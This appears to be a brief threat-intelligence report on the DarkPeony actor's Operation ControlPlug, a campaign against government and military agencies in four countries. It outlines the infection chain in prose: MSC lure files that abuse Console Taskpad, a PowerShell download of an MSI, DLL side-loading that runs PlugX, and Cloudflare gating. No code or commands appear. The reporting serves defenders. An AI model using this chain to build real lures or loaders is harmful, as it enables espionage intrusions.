DarkPeony Carries Out Operation Control Plug
The DarkPeony threat actor executed Operation ControlPlug against military and government agencies in Myanmar the Philippines Mongolia and Serbia. The campaign began with MSC files which when opened displayed a screen prompting users to click a link that executed a PowerShell script. This script remotely downloaded and executed an MSI file containing an EXE DLL and DAT file. The EXE file though legitimate facilitated DLL side-loading which loaded the DLL file to decode and execute the DAT file ultimately running PlugX. MSC files used with Microsoft Management Console exploited their Console Taskpad feature to execute arbitrary commands deceiving users into triggering the PowerShell script. Websites distributing the MSI files used Cloudflare to control access obstructing researchers while targeting specific organizations.